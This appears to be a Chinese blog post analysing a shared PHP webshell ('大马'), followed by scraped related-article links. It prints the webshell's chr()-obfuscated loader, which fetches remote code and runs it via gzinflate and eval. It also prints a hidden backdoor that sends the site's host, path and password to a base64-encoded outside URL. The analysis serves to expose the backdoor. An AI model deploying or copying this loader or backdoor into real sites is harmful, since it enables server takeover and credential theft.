php大马程序_php大马是什么
大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。
有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 (推荐学习:PHP视频教程)<?php
$password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>
一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。
就是个简单的基于base64加gzinflate加密
后门部分:if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('');
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
php大马程序_php大马是什么相关推荐
- java大马后门_PHP大马后门分析
PHP大马后门分析 PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能.网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就 ...
- php serv-u,用php写的serv-u的web申请账号的程序_php
//Sign.php //系统适用于win2000/2003/xp $path="e://serv-u//ServUDaemon.ini";//用户文件的路径 $fabu=&quo ...
- 简繁 data_gb.php 下载,简繁转换的程序_php
php代码:-------------------------------------------------------------------------------- /** *中速版,中等内存 ...
- 昵称到拼音php,php 汉字转换拼音程序_PHP教程
php 汉字转换拼音程序 $p=ord(substr($str,$i,1)); if($p>160){ $q=ord(substr($str,++$i,1)); $p=$p*256+$q-655 ...
- 会员直推奖php程序_PHP自适应卡益源码 前台直销源码 报单费 直推奖 有内部商城...
演示地址:如有演示站请以演示为准,无演示站以截图为准,源码太多服务器有限,无法搭建所有源码演示站,请谅解! 新手购买指导:1.在本站注册账号 丨 2.登录已注册账号充值源码所需金币 丨 3.登录账号下 ...
- php 去除中英文空格,php去除字符串首尾中英文空格程序_PHP教程
下面本文章来给各位同学总结了几种php去除字符串首尾中英文空格程序实例,这里有用正则替换与trim系列函数删除,下面我们来看看. 例1.trim函数删除空格 trim()函数用于去除字符串开始位置以及 ...
- php分类程序,PHP无限分类实现程序_PHP教程
1.数据库通过设置父类ID来进行唯一索引,然后使用函数的递归调用实现无限分类:2.数据库设计通过特定格式进行排列,然后使用mysql查询关键函数:concat.程序实现比较简单 首先我们假设有这样的一 ...
- php9宫格抽奖程序_PHP抽奖算法程序代码分享
抽奖算法需要满足的需求如下: 1.可以控制中奖的概率 2.具有随机性 3.最好可以控制奖品的数量 4.根据用户ID或者ip.手机号.QQ号等条件限制抽奖次数 初期就这些需求,然后根据网上的资料,采用了 ...
- php 桌面应用程序_PHP应用程序环境
php 桌面应用程序 The following is a short extract from our recent book, Jump Start PHP Environment, availa ...
- 简单php抽奖,基于PHP实现简单的随机抽奖小程序_PHP
一个抽奖小程序,概论可控,也可某个奖品在前端显示,而程序中根本不可能获得!把所有的概率x10后相加起来,新数组中每项的值等于它前几个的和加上它本身. 然后随即生成一个0到最大数之间的一个数,通过循环查 ...
最新文章
- XML解析(一),SAX解析XML
- vs12新建ajax,VS2012下WebService 的创建,部署和使用
- Wireshark文档阅读笔记-WebSocket协议基本概念
- html 怎么给li空格,html 空格
- linux树形看磁盘,2 - 3、Linux—磁盘分区和挂载【2021-3-3】
- 使用jsPlumb插件实现动态连线功能
- django 使用新的虚拟环境
- 【系统分析师之路】第五章 复盘软件工程(软件过程改进)
- SwitchHosts for Mac(mac hosts修改工具)
- 全球与中国ARM开发套件市场现状及未来发展趋势
- 【爱加密】防止签名破解
- java ico图片转png_Java 图片处理: ico 格式转 PNG/JPG 等格式
- RJ45网线水晶头超5类线6类线千兆网百兆网区别
- 计算机组装有哪些,教你组装电脑主要配置有哪些
- android 照片裁剪_如何在Android上裁剪和编辑照片
- Android移动应用技术打地鼠小游戏(简单App实现)——学习成果
- 2.20 锤子剪刀布
- MybatisPlus 通用CRUD操作
- 如何用计算机制作动态图,怎样用电脑轻松制作GIF动图图片
- K8S相同后端存储在2个K8S集群PVC数据直接拷贝